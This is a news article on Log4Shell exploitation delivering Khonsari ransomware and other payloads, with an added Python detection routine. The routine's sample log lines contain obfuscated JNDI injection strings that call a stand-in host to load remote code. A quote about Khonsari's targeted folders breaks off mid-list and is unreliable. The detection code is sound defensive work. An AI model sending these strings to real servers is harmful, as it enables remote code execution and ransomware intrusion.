Romanian cybersecurity company Bitdefender reported on Monday that attackers are exploiting the newly disclosed, severe Log4j vulnerability to target Windows devices with a new ransomware family called Khonsari, as well as a remote access Trojan dubbed Orcus.
The attack makes use of the remote code execution (RCE) flaw to download an additional payload, a .NET binary, from a remote server; the payload encrypts files with the extension “.khonsari” and displays a ransom note urging victims to pay a Bitcoin ransom to regain access to their files.
Sergio Caltagirone, vice president of threat intelligence at Dragos, reported: “Log4j is heavily used in external/internet-facing and internal applications that manage and control industrial processes. Many industrial operations like electric power, water, food and beverage, manufacturing, and others are exposed to potential remote exploitation and access. External and internet-facing applications should be prioritised above internal applications because of their internet exposure, even though both are susceptible.”
In addition, CISA has added the Log4j vulnerability to its Known Exploited Vulnerabilities Catalog, giving government agencies until December 24 to apply fixes. Government agencies in Austria, Canada, New Zealand and the United Kingdom have all issued similar warnings.
“Once executed, the malicious file will list all the drives and encrypt them entirely, except the C:\ drive. On the C:\ drive, Khonsari will encrypt only the following folders:
According to Kaspersky telemetry data, the vast majority of exploitation attempts against Log4Shell originated in Russia (4,275), followed by Brazil (2,493), the United States (1,746), Germany (1,336), Mexico (1,177), Italy (1,094), France (1,008), and Iran (1,008).
Check Point researchers warned that 60 new variants of the original Log4j exploit were released in less than 24 hours; the firm said it had blocked over 1,272,000 intrusion attempts, 46 percent of them staged by known criminal groups. The Israeli security firm has branded Log4Shell a “real cyber epidemic”.
Active exploitation attempts in the wild have so far involved using the bug to enrol devices into a botnet and to deliver additional payloads such as Cobalt Strike and bitcoin miners. Sophos, a cybersecurity firm, said it had seen attempts to steal Amazon Web Services (AWS) keys and other confidential information from infected servers.
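The exploit variants and in-the-wild attempts described above leave a recognisable trace in web-server request logs: a Log4j `${jndi:...}` lookup, often wrapped in nested `${lower:…}`, `${upper:…}` or `${…:-default}` lookups and URL encoding to evade simple string matching. The following detection routine is an added example, not code from the article or from any of the vendors it cites; it URL-decodes each line, unwinds the nested lookups the way the logger would, and flags any line in which a `jndi:` lookup surfaces. The log lines are constructed, and the IP addresses are documentation ranges.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines for illustration (not taken from the article).
SAMPLE_LOGS = [
    '198.51.100.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [13/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOEXIST:-j}ndi:rmi://203.0.113.10:1099/b}"',
    '198.51.100.7 - - [13/Dec/2021:10:01:15 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fc%7D HTTP/1.1" 200 99 "-" "curl/7.68.0"',
]

# An innermost lookup: ${...} whose body contains no further '$', '{' or '}'.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def resolve_lookup(body: str) -> str:
    """Evaluate one innermost Log4j lookup for the forms used to hide 'jndi:'."""
    if ":-" in body:                       # ${prefix:key:-default} -> default
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":  # ${lower:X} -> x
        return rest.lower()
    if sep and prefix.lower() == "upper":  # ${upper:x} -> X
        return rest.upper()
    return ""  # unknown lookup with no default: treat as resolving to nothing


def find_jndi_lookup(line: str) -> Optional[str]:
    """Return the resolved 'jndi:...' lookup hidden in a log line, or None."""
    text = unquote(line)                   # undo URL encoding in query strings
    while (m := LOOKUP.search(text)):
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return body
        # Each substitution removes the surrounding "${" and "}", so the text
        # strictly shrinks and the loop always terminates.
        text = text[:m.start()] + resolve_lookup(body) + text[m.end():]
    return None


def scan_logs(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, resolved_lookup) for every line carrying a JNDI lookup."""
    return [(i, hit) for i, line in enumerate(lines, 1)
            if (hit := find_jndi_lookup(line)) is not None]


if __name__ == "__main__":
    for lineno, hit in scan_logs(SAMPLE_LOGS):
        print(f"line {lineno}: {hit}")
```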
Finally, CISA Director Jen Easterly concluded that “To be clear, this vulnerability poses a grave risk,” adding: “Given its widespread use, this vulnerability, which is being widely exploited by an increasing number of threat actors, poses an important challenge to network defenders. Vendors should also communicate with their consumers to ensure that end users are aware of the vulnerability and that software upgrades are prioritised.”